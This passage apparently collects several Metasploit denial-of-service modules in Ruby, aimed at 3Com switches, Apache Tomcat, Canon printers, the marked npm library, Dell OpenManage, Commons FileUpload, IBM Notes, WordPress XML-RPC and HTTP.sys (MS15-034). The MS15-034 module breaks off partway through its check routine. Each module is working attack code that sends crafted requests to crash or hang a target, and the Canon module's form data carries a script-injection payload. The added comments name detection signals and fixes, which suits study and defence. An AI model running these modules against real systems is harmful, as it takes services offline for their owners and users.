##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for the 3Com SuperStack HTTP management interface.
# One HTTP/1.0 GET carrying a 128000-byte Referer header makes the switch stop
# responding temporarily; the device does not reset. The description reports
# firmware before v2.72 as affected (tested on a 3300SM running v2.66).
# From the defensive side, a Referer header of this size is trivially
# identifiable at a proxy or IDS placed in front of the management port.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the RPORT option (default 80).
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => '3Com SuperStack Switch Denial of Service',
        'Description' => %q{
          This module causes a temporary denial of service condition
          against 3Com SuperStack switches. By sending excessive data
          to the HTTP Management interface, the switch stops responding
          temporarily. The device does not reset. Tested successfully
          against a 3300SM firmware v2.66. Reported to affect versions
          prior to v2.72.
        },
        'Author' => ['aushack'],
        'License' => MSF_LICENSE,
        'References' => [
          # aushack - I am not sure if these are correct, but the closest match!
          ['OSVDB', '7246'],
          ['CVE', '2004-2691'],
          ['URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf']
        ],
        'DisclosureDate' => '2004-06-24'
      )
    )

    register_options([Opt::RPORT(80)])
  end

  # Sends a single oversized request and reports the outcome by how the
  # connection ends: a reset (ECONNRESET) is reported as success, a refused
  # connection as unreachable, and a clean disconnect as unsuccessful.
  def run
    connect
    print_status("Sending DoS packet to #{rhost}:#{rport}")

    # One random letter repeated 128000 times; the header length is the only
    # thing that makes this request unusual.
    filler = Rex::Text.rand_text_alpha(1) * 128000
    request = "GET / HTTP/1.0\r\nReferer: #{filler}\r\n\r\n"

    sock.put(request)
    disconnect
    print_error("DoS packet unsuccessful")
  rescue ::Rex::ConnectionRefused
    print_error("Unable to connect to #{rhost}:#{rport}")
  rescue ::Errno::ECONNRESET
    print_good("DoS packet successful. #{rhost} not responding.")
  end
end
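##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2010-2227: Apache Tomcat 5.5.0-5.5.29,
# 6.0.0-6.0.27 and 7.0.0 beta mishandle an invalid Transfer-Encoding header
# value ("buffered"), which can cause an application outage or expose data
# from a recycled buffer. Each request is a POST declaring Content-Length
# 65537 with a 65537-byte body of one repeated letter; RLIMIT sets how many
# are sent, each on its own TCP connection. A Transfer-Encoding value that is
# not a registered transfer coding is the detection signal for this traffic.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata, RPORT (default 8000) and RLIMIT (default 25).
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Tomcat Transfer-Encoding Information Disclosure and DoS',
        'Description' => %q{
          Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not
          properly handle an invalid Transfer-Encoding header, which allows remote attackers
          to cause a denial of service (application outage) or obtain sensitive information
          via a crafted header that interferes with "recycling of a buffer."
        },
        'Author' => [
          'Steve Jones', # original discoverer
          'Hoagie <andi[at]void.at>', # original public exploit
          'Paulino Calderon <calderon[at]websec.mx>' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2010-2227'],
          ['OSVDB', '66319'],
          ['BID', '41544']
        ],
        'DisclosureDate' => '2010-07-09'
      )
    )

    register_options(
      [
        Opt::RPORT(8000),
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 25])
      ]
    )
  end

  # Sends RLIMIT requests, one connection each. Integer#upto replaces the
  # original `for` loop so the counter no longer leaks into method scope.
  def run
    1.upto(datastore['RLIMIT']) do |request_number|
      send_dos_request(request_number)
    end
  end

  private

  # Builds and sends one malformed POST to rhost:rport and prints the outcome:
  # ECONNRESET is reported as success, refused/unreachable/timed-out
  # connections as errors, and a clean disconnect as an unsuccessful packet.
  #
  # @param request_number [Integer] 1-based index, used only in status output
  def send_dos_request(request_number)
    connect
    print_status("Sending DoS packet #{request_number} to #{rhost}:#{rport}")

    sploit = "POST / HTTP/1.1\r\n"
    sploit << "Host: " + rhost + "\r\n"
    # "buffered" is not a valid transfer coding; this header is what the
    # affected versions fail to handle.
    sploit << "Transfer-Encoding: buffered\r\n"
    sploit << "Content-Length: 65537\r\n\r\n"
    sploit << Rex::Text.rand_text_alpha(1) * 65537

    sock.put(sploit + "\r\n\r\n")
    disconnect

    print_error("DoS packet unsuccessful")
  rescue ::Rex::ConnectionRefused
    print_error("Unable to connect to #{rhost}:#{rport}")
  rescue ::Errno::ECONNRESET
    print_good("DoS packet successful. #{rhost} not responding.")
  rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    print_error("Couldn't connect to #{rhost}:#{rport}")
  rescue ::Timeout::Error, ::Errno::EPIPE
    # Best-effort, as in the original: a timeout or broken pipe mid-send is
    # neither a confirmed success nor a connection failure, so nothing is printed.
  end
end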
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2013-4615 in the HTTP management interface of
# several Canon wireless printer models. Two requests are involved: a POST of
# the LAN settings form to cgi_lan.cgi with a crafted LAN_TXT24 value, then a
# GET of lan_set_content.html which, per the original comment, triggers the
# hang. The description notes that a successful run leaves the device
# recoverable only by a physical power cycle, so the management interface
# should not be reachable from untrusted networks.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers module metadata; no extra options beyond the HttpClient defaults.
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Canon Wireless Printer Denial Of Service',
        'Description' => %q{
          The HTTP management interface on several models of Canon Wireless printers
          allows for a Denial of Service (DoS) condition via a crafted HTTP request. Note:
          if this module is successful, the device can only be recovered with a physical
          power cycle.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
        'References' => [
          ['CVE', '2013-4615'],
          ['URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
        ],
        'DisclosureDate' => '2013-06-18'
      )
    )
  end

  # Probes the root page with a 10-second timeout.
  #
  # @return [Boolean] true when any HTTP response came back
  def is_alive?
    res = send_request_raw({ 'method' => 'GET', 'uri' => '/' }, 10)
    !res.nil?
  end

  # Posts the settings form, loads the network options page, then reports
  # whether the device still answers. Only the first request is guarded
  # against connection errors, as in the original.
  def run
    begin
      # The first request will set the new IP
      send_request_cgi(
        'method' => 'POST',
        'uri' => '/English/pages_MacUS/cgi_lan.cgi',
        'data' => lan_form_data
      )
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE
      print_error("Couldn't connect to #{rhost}:#{rport}")
      return
    end

    # The second request will load the network options page, which seems to trigger the DoS
    send_request_cgi(
      { 'method' => 'GET', 'uri' => '/English/pages_MacUS/lan_set_content.html' },
      5
    ) # default timeout, we don't care about the response

    # Check to see if it worked or not
    if is_alive?
      print_error("#{rhost}:#{rport} - Server is still alive")
    else
      print_good("#{rhost}:#{rport} - Connection Refused: Success!")
    end
  end

  private

  # Form body for the cgi_lan.cgi POST, joined into one
  # application/x-www-form-urlencoded string. LAN_TXT24 carries the crafted value.
  #
  # @return [String]
  def lan_form_data
    [
      'OK.x=61',
      'OK.y=12',
      'LAN_OPT1=2',
      'LAN_TXT1=Wireless',
      'LAN_OPT3=1',
      'LAN_TXT21=192',
      'LAN_TXT22=168',
      'LAN_TXT23=1',
      %q{LAN_TXT24=114"><script>alert('xss');</script>},
      'LAN_TXT31=255',
      'LAN_TXT32=255',
      'LAN_TXT33=255',
      'LAN_TXT34=0',
      'LAN_TXT41=192',
      'LAN_TXT42=168',
      'LAN_TXT43=1',
      'LAN_TXT44=1',
      'LAN_OPT2=4',
      'LAN_OPT4=1',
      'LAN_HID1=1'
    ].join('&')
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for the regular-expression denial of service in the
# "heading" expression of the npm module "marked" (versions up to 0.4.0).
# Flow: confirm the service answers, send one request whose HTTP_PARAMETER
# value is "# #" followed by 20 KiB of spaces, then probe again and treat
# a missing response or a timeout as the service being stuck. For defenders
# the fix is upgrading "marked" past 0.4.0; an input-length cap on markdown
# fields also limits the backtracking cost.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers module metadata, RPORT (default 80), HTTP_METHOD (default GET),
  # HTTP_PARAMETER (the parameter rendered through "marked") and TARGETURI.
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'marked npm module "heading" ReDoS',
        'Description' => %q{
          This module exploits a Regular Expression Denial of Service vulnerability
          in the npm module "marked". The vulnerable portion of code that this module
          targets is in the "heading" regular expression. Web applications that use
          "marked" for generating html from markdown are vulnerable. Versions up to
          0.4.0 are vulnerable.
        },
        'References' => [
          ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'],
          ['CWE', '400']
        ],
        'Author' => [
          'Adam Cazzolla, Sonatype Security Research',
          'Nick Starke, Sonatype Security Research'
        ],
        'License' => MSF_LICENSE
      )
    )

    register_options(
      [
        Opt::RPORT(80),
        OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']),
        OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']),
        OptString.new('TARGETURI', [true, 'The URL Path to use', '/'])
      ]
    )
  end

  # Checks the service, sends the ReDoS request, then checks again.
  # Fails the module when the initial check cannot reach the service.
  def run
    return fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.") unless test_service

    trigger_redos
    test_service_unresponsive
  end

  # Sends the crafted value in HTTP_PARAMETER using HTTP_METHOD; the
  # parameter container key is vars_get / vars_post etc. derived from the verb.
  # A response means the request did not stall the service; no response or a
  # timeout is reported as the likely success case.
  def trigger_redos
    print_status("Sending ReDoS request to #{peer}.")

    verb = datastore['HTTP_METHOD']
    # Heading prefix followed by 20 KiB of spaces and one random letter.
    crafted_value = "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1)

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => verb,
      "vars_#{verb.downcase}" => { datastore['HTTP_PARAMETER'] => crafted_value }
    )

    fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.") if res

    print_status("No response received from #{peer}, service is most likely unresponsive.")
  rescue ::Rex::ConnectionRefused
    print_error("Unable to connect to #{peer}.")
  rescue ::Timeout::Error
    print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
  end

  # Requests a random path and reports whether the service still answers.
  def test_service_unresponsive
    print_status('Testing for service unresponsiveness.')

    res = send_request_cgi('uri' => '/' + Rex::Text.rand_text_alpha(8), 'method' => 'GET')

    if res
      print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
    else
      print_good('Service not responding.')
    end
  rescue ::Rex::ConnectionRefused
    print_error('An unknown error occurred.')
  rescue ::Timeout::Error
    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
  end

  # Requests a random path and treats any status from 100 up to (not
  # including) 500 as a working service.
  #
  # @return [Boolean] true when the service answered with such a status
  def test_service
    print_status('Testing Service to make sure it is working.')

    res = send_request_cgi('uri' => '/' + Rex::Text.rand_text_alpha(8), 'method' => 'GET')

    healthy = !res.nil? && res.code >= 100 && res.code < 500
    print_status("Test request successful, attempting to send payload. Server returned #{res.code}") if healthy
    healthy
  rescue ::Rex::ConnectionRefused
    print_error("Unable to connect to #{peer}.")
    false
  end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2004-0331, a heap overflow in the Dell
# OpenManage Web Server (omws32.exe) versions 3.2-3.7.1. One POST to
# /servlet/LoginServlet with an over-long "application" form value crashes
# the service. The login request runs over SSL on port 1311 by default, so
# a network IDS will only see it if TLS is terminated in front of the server;
# host-side, an omws32.exe crash is the indicator.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  # Registers module metadata, RPORT (default 1311) and SSL (default true).
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dell OpenManage POST Request Heap Overflow (win32)',
        'Description' => %q{
          This module exploits a heap overflow in the Dell OpenManage
          Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
          exists due to a boundary error within the handling of POST requests,
          where the application input is set to an overly long file name.
          This module will crash the web server, however it is likely exploitable
          under certain conditions.
        },
        'Author' => ['aushack'],
        'License' => MSF_LICENSE,
        'References' => [
          ['URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html'],
          ['BID', '9750'],
          ['OSVDB', '4077'],
          ['CVE', '2004-0331']
        ],
        'DisclosureDate' => '2004-02-26'
      )
    )

    register_options(
      [
        Opt::RPORT(1311),
        OptBool.new('SSL', [true, 'Use SSL', true])
      ],
      self.class
    )
  end

  # Connects, sends one POST whose body ends in a 2000-byte cyclic pattern,
  # and disconnects. No response is read and no outcome is reported.
  def run
    connect

    body = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)
    request = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n" \
              "Content-Length: #{body.length}\r\n\r\n" \
              "#{body}\r\n\r\n"

    sock.put(request)

    disconnect
  end
end
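##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2014-0050 in Apache Commons FileUpload 1.0-1.3
# (and the copy bundled in Tomcat 7.0.0-7.0.50 and 8.0.0-RC1-8.0.1): a
# multipart/form-data Content-Type whose boundary is 4092 characters long
# sends the parser into an infinite loop. RLIMIT requests are sent without
# waiting for responses. A multipart boundary of that length is well beyond
# anything a browser emits and is a reliable detection signal.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers module metadata, RPORT (default 8080), TARGETURI and RLIMIT.
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',
        'Description' => %q{
          This module triggers an infinite loop in Apache Commons FileUpload 1.0
          through 1.3 via a specially crafted Content-Type header.
          Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle
          mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50
          and 8.0.0-RC1 through 8.0.1 are affected by this issue. Tomcat 6 also
          uses Commons FileUpload as part of the Manager application.
        },
        'Author' => [
          'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.
          'ribeirux' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-0050'],
          ['URL', 'https://tomcat.apache.org/security-8.html'],
          ['URL', 'https://tomcat.apache.org/security-7.html']
        ],
        'DisclosureDate' => '2014-02-06'
      )
    )

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('TARGETURI', [true, 'The request URI', '/']),
        OptInt.new('RLIMIT', [true, 'Number of requests to send', 50])
      ]
    )
  end

  # Sends RLIMIT POST requests with the over-long boundary, one connection
  # each, and stops at the first connection error. The request is built once
  # since nothing in it changes between iterations.
  def run
    boundary = "0" * 4092
    opts = {
      'method' => "POST",
      'uri' => normalize_uri(target_uri.to_s),
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'data' => "#{boundary}00000",
      'headers' => {
        'Accept' => '*/*'
      }
    }

    # Integer#upto instead of the `for` loop flagged in the original, so the
    # counter and the client handle are scoped to the iteration.
    1.upto(datastore['RLIMIT']) do |request_number|
      print_status("Sending request #{request_number} to #{peer}")
      client = nil
      begin
        client = connect
        request = client.request_cgi(opts)
        client.send_request(request)
        # Don't wait for a response
      rescue ::Rex::ConnectionError => exception
        print_error("Unable to connect: '#{exception.message}'")
        return
      ensure
        # client stays nil when connect itself raised
        disconnect(client) if client
      end
    end
  end
end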
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module for CVE-2017-1129: it serves an HTML page whose script
# loops forever calling encodeURI through `instanceof` inside a try/catch,
# which hangs the browser embedded in IBM Lotus Notes. The only action is
# WebServer (passive); the page is returned for every requested URI. This is
# a client-side hang — the client must load the page — so the fix is on the
# Notes side (see the IBM support reference).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  # Registers module metadata and the single WebServer action.
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "IBM Notes encodeURI DOS",
        'Description' => %q(
          This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes.
          If successful, it could cause the Notes client to hang and have to be restarted.
        ),
        'License' => MSF_LICENSE,
        'Author' => [
          'Dhiraj Mishra',
        ],
        'References' => [
          [ 'EDB', '42602'],
          [ 'CVE', '2017-1129' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ]
        ],
        'DisclosureDate' => '2017-08-31',
        'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction' => 'WebServer'
      )
    )
  end

  # Starts the HTTP server; requests are handled by #on_request_uri.
  def run
    exploit # start http server
  end

  # Builds the page once and keeps it in @html for every response.
  # The literal's whitespace is part of the served content and is left as is.
  def setup
    @html = %|
 <html><head><title>DOS</title>
<script type="text/javascript">
while (true) try {
 var object = { };
 function d(d0) {
 var d0 = (object instanceof encodeURI)('foo');
 }
 d(75);
 } catch (d) { }
</script>
</head></html>
 |
  end

  # Serves @html for any requested URI.
  #
  # @param cli the connected client passed by the HttpServer mixin
  # @param _request the request, unused
  def on_request_uri(cli, _request)
    print_status('Sending response')
    send_response(cli, @html)
  end
end
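##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2014-5266: XML-RPC parsing in WordPress
# 3.5-3.9.2 (3.8.4 and 3.7.4 also patched) is vulnerable to an XML-based
# denial of service. The module first probes how large a request the server
# accepts (stepping up until a 500 comes back), then posts RLIMIT copies of
# an XML document sized to that limit without waiting for responses.
# A POST to xmlrpc.php whose body carries a DOCTYPE with an ENTITY
# declaration is the traffic signature; upgrading past 3.9.2 is the fix.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Dos

  # Registers module metadata, RLIMIT (default 1000) and the advanced
  # FINGERPRINT_STEP / DEFAULT_LIMIT options (both default 8).
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress XMLRPC DoS',
        'Description' => %q{
          Wordpress XMLRPC parsing is vulnerable to a XML based denial of service.
          This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are
          also patched).
        },
        'Author' => [
          'Nir Goldshlager', # advisory
          'Christian Mehlmauer' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-5266'],
          ['URL', 'https://wordpress.org/news/2014/08/wordpress-3-9-2/'],
          ['URL', 'http://www.breaksec.com/?p=6362'],
          ['URL', 'https://mashable.com/archive/wordpress-xml-blowup-dos'],
          ['URL', 'https://core.trac.wordpress.org/changeset/29404'],
          ['WPVDB', '7526']
        ],
        'DisclosureDate' => '2014-08-06'
      )
    )

    register_options(
      [
        OptInt.new('RLIMIT', [true, "Number of requests to send", 1000])
      ]
    )

    register_advanced_options(
      [
        OptInt.new('FINGERPRINT_STEP', [true, "The stepsize in MB when fingerprinting", 8]),
        OptInt.new('DEFAULT_LIMIT', [true, "The default limit in MB", 8])
      ]
    )
  end

  # @return [Integer] number of requests to send (RLIMIT)
  def rlimit
    datastore['RLIMIT']
  end

  # @return [Integer] fallback size when no limit can be determined (DEFAULT_LIMIT)
  def default_limit
    datastore['DEFAULT_LIMIT']
  end

  # @return [Integer] probe increment (FINGERPRINT_STEP)
  def fingerprint_step
    datastore['FINGERPRINT_STEP']
  end

  # Probes the accepted request size in FINGERPRINT_STEP increments below 1024.
  # Returns the last size that did not produce a 500, or DEFAULT_LIMIT when
  # no 500 is seen or the connection fails.
  #
  # @return [Integer] size passed on to #generate_xml
  def fingerprint
    memory_to_use = fingerprint_step
    # try out the available memory in steps
    # apache will return a server error if the limit is reached
    while memory_to_use < 1024
      vprint_status("trying memory limit #{memory_to_use}MB")
      opts = {
        'method' => 'POST',
        'uri' => wordpress_url_xmlrpc,
        'data' => generate_xml(memory_to_use),
        'ctype' => 'text/xml'
      }

      begin
        # low timeout because the server error is returned immediately
        # (the original wrote `timeout = 3` here, which only assigned a
        # throwaway local; the positional argument is what send_request_cgi reads)
        res = send_request_cgi(opts, 3)
      rescue ::Rex::ConnectionError => exception
        print_error("unable to connect: '#{exception.message}'")
        break
      end

      if res && res.code == 500
        # limit reached, return last limit
        last_limit = memory_to_use - fingerprint_step
        vprint_status("got an error - using limit #{last_limit}MB")
        return last_limit
      end

      memory_to_use += fingerprint_step
    end

    # no limit can be determined
    print_warning("can not determine limit, will use default of #{default_limit}")
    default_limit
  end

  # Builds an XML-RPC document of size * 1024 bytes: one long entity declared
  # in the DOCTYPE and referenced repeatedly from methodName, with the
  # remaining space placed in the entity value.
  #
  # @param size [Integer] size unit as returned by #fingerprint
  # @return [String] the XML document
  def generate_xml(size)
    entity = Rex::Text.rand_text_alpha(3)
    doctype = Rex::Text.rand_text_alpha(6)
    param_value_1 = Rex::Text.rand_text_alpha(5)
    param_value_2 = Rex::Text.rand_text_alpha(5)

    size_bytes = size * 1024

    # Wordpress only resolves one level of entities so we need
    # to specify one long entity and reference it multiple times
    xml = '<?xml version="1.0" encoding="iso-8859-1"?>'
    xml << "<!DOCTYPE %{doctype} ["
    xml << "<!ENTITY %{entity} \"%{entity_value}\">"
    xml << ']>'
    xml << '<methodCall>'
    xml << '<methodName>'
    xml << "%{payload}"
    xml << '</methodName>'
    xml << '<params>'
    xml << "<param><value>%{param_value_1}</value></param>"
    xml << "<param><value>%{param_value_2}</value></param>"
    xml << '</params>'
    xml << '</methodCall>'

    # Render once with empty values to measure the fixed overhead of the template.
    empty_xml = xml % {
      :doctype => '',
      :entity => '',
      :entity_value => '',
      :payload => '',
      :param_value_1 => '',
      :param_value_2 => ''
    }

    space_to_fill = size_bytes - empty_xml.size
    vprint_status("max XML space to fill: #{space_to_fill} bytes")

    # Entity references take space_to_fill / 6 slots; whatever is left after
    # the references is the length of the entity value itself.
    payload = "&#{entity};" * (space_to_fill / 6)
    entity_value_length = space_to_fill - payload.length

    xml % {
      :doctype => doctype,
      :entity => entity,
      :entity_value => Rex::Text.rand_text_alpha(entity_value_length),
      :payload => payload,
      :param_value_1 => param_value_1,
      :param_value_2 => param_value_2
    }
  end

  # Fingerprints the size limit, generates the document once, then sends it
  # RLIMIT times (one connection each) and stops at the first connection error.
  def run
    # get the max size
    print_status("trying to fingerprint the maximum memory we could use")
    size = fingerprint
    print_status("using #{size}MB as memory limit")

    # only generate once
    xml = generate_xml(size)
    # request options do not change between iterations
    opts = {
      'method' => 'POST',
      'uri' => wordpress_url_xmlrpc,
      'data' => xml,
      'ctype' => 'text/xml'
    }

    # Integer#upto instead of the `for` loop, so the counter and client handle
    # are scoped to the iteration.
    1.upto(rlimit) do |request_number|
      print_status("sending request ##{request_number}...")
      client = nil
      begin
        client = connect
        request = client.request_cgi(opts)
        client.send_request(request)
        # Don't wait for a response, can take very long
      rescue ::Rex::ConnectionError => exception
        print_error("unable to connect: '#{exception.message}'")
        return
      ensure
        # client stays nil when connect itself raised
        disconnect(client) if client
      end
    end
  end
end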
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Scanner/DoS module for CVE-2015-1635 (MS15-034) in the Windows HTTP
# protocol stack (HTTP.sys). The check sends a GET for a static resource with
# "Range: bytes=0-18446744073709551615" (0xFFFFFFFFFFFFFFFF) and classifies
# the host by the response body: "Requested Range Not Satisfiable" is treated
# as vulnerable, "The request has an invalid header name" as patched. Only
# hosts that check as vulnerable receive the DoS request, whose Range starts
# at the file size minus two with the same 64-bit upper bound. A Range header
# carrying that upper bound is the signature to alert on; MS15-034 is the fix.
class MetasploitModule < Msf::Auxiliary

  # Watch out, dos all the things
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Dos

  # Registers module metadata and TARGETURI (a directory or a file resource).
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service',
      'Description' => %q{
        This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a
        vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code
        execution. This module will try to cause a denial-of-service.
      },
      'Author' =>
        [
          # Bill did all the work (see the pastebin code), twitter: @hectorh56193716
          'Bill Finlayson',
          # MSF. But really, these people made it happen:
          # https://github.com/rapid7/metasploit-framework/pull/5150
          'sinn3r'
        ],
      'References' =>
        [
          ['CVE', '2015-1635'],
          ['MSB', 'MS15-034'],
          ['URL', 'https://pastebin.com/ypURDPc4'],
          ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'],
          ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'],
          ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/']
        ],
      'License' => MSF_LICENSE
    ))

    register_options(
      [
        OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/'])
      ])
  end

  # Upper bound used in every Range header: 2^64 - 1.
  #
  # @return [Integer]
  def upper_range
    0xFFFFFFFFFFFFFFFF
  end

  # Scanner entry point. Only a host whose check returns Vulnerable is sent
  # the DoS request; everything else is reported and left alone.
  #
  # @param ip [String] host being scanned
  def run_host(ip)
    if check_host(ip) == Exploit::CheckCode::Vulnerable
      dos_host(ip)
    else
      print_status("Probably not vulnerable, will not dos it.")
    end
  end

  # Needed to allow the vulnerable uri to be shared between the #check and #dos
  # (check_host assigns target_uri.path; memoizing the object keeps that change).
  def target_uri
    @target_uri ||= super
  end

  # Fetches the target resource once and memoizes its body length. Returns -1
  # when there is no response or the resource answers 404. A lambda is used
  # so the early `return`s leave the lambda rather than this method.
  #
  # @param ip [String] unused; the request goes through the HttpClient mixin
  # @return [Integer] body length in bytes, or -1
  def get_file_size(ip)
    @file_size ||= lambda {
      file_size = -1
      uri = normalize_uri(target_uri.path)
      res = send_request_raw('uri' => uri)

      unless res
        vprint_error("Connection timed out")
        return file_size
      end

      if res.code == 404
        vprint_error("You got a 404. URI must be a valid resource.")
        return file_size
      end

      file_size = res.body.length
      vprint_status("File length: #{file_size} bytes")

      return file_size
    }.call
  end

  # Sends the DoS request with a Range starting two bytes before the end of
  # the resource. A raw Rex client is used instead of the mixin (see the
  # comment below) so a hung target does not hang this module as well.
  #
  # @param ip [String] host the raw client connects to
  def dos_host(ip)
    file_size = get_file_size(ip)
    lower_range = file_size - 2

    # In here we have to use Rex because if we dos it, it causes our module to hang too
    uri = normalize_uri(target_uri.path)
    begin
      cli = Rex::Proto::Http::Client.new(ip)
      cli.connect
      req = cli.request_raw(
        'uri' => uri,
        'method' => 'GET',
        'headers' => {
          'Range' => "bytes=#{lower_range}-#{upper_range}"
        }
      )
      cli.send_request(req)
    rescue ::Errno::EPIPE, ::Timeout::Error
      # Same exceptions the HttpClient mixin catches
    end
    print_status("DOS request sent")
  end

  # Lists URIs worth probing. A TARGETURI that does not end in '/' is used as
  # is. For a directory, welcome.png under it is tried first, followed by any
  # link/script/style/img reference on the page whose host is vhost or rhost
  # and whose path ends in a file extension.
  #
  # @return [Array<String>] unique candidate paths
  def potential_static_files_uris
    uri = normalize_uri(target_uri.path)

    return [uri] unless uri[-1, 1] == '/'

    uris = ["#{uri}welcome.png"]
    res = send_request_raw('uri' => uri, 'method' => 'GET')

    return uris unless res

    site_uri = URI.parse(full_uri)
    # Re-encode so Nokogiri never sees invalid byte sequences from the body
    page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace))

    page.xpath('//link|//script|//style|//img').each do |tag|
      %w(href src).each do |attribute|
        attr_value = tag[attribute]

        next unless attr_value && !attr_value.empty?

        # NOTE: this reassigns the method-level `uri` to a URI object; harmless
        # because `uri` is not read again after the loop.
        uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip))

        next unless uri.host == vhost || uri.host == rhost

        uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file
      end
    end

    uris.uniq
  end

  # Probes each candidate URI with a 0-to-2^64-1 Range and classifies the host
  # by the response body. The first URI that looks vulnerable is stored in
  # target_uri.path for #dos_host. Returns Unknown when no candidate produced
  # a recognisable answer.
  #
  # @param ip [String] unused; requests go through the HttpClient mixin
  # @return [Exploit::CheckCode] Vulnerable, Safe or Unknown
  def check_host(ip)
    potential_static_files_uris.each do |potential_uri|
      uri = normalize_uri(potential_uri)

      res = send_request_raw(
        'uri' => uri,
        'method' => 'GET',
        'headers' => {
          'Range' => "bytes=0-#{upper_range}"
        }
      )

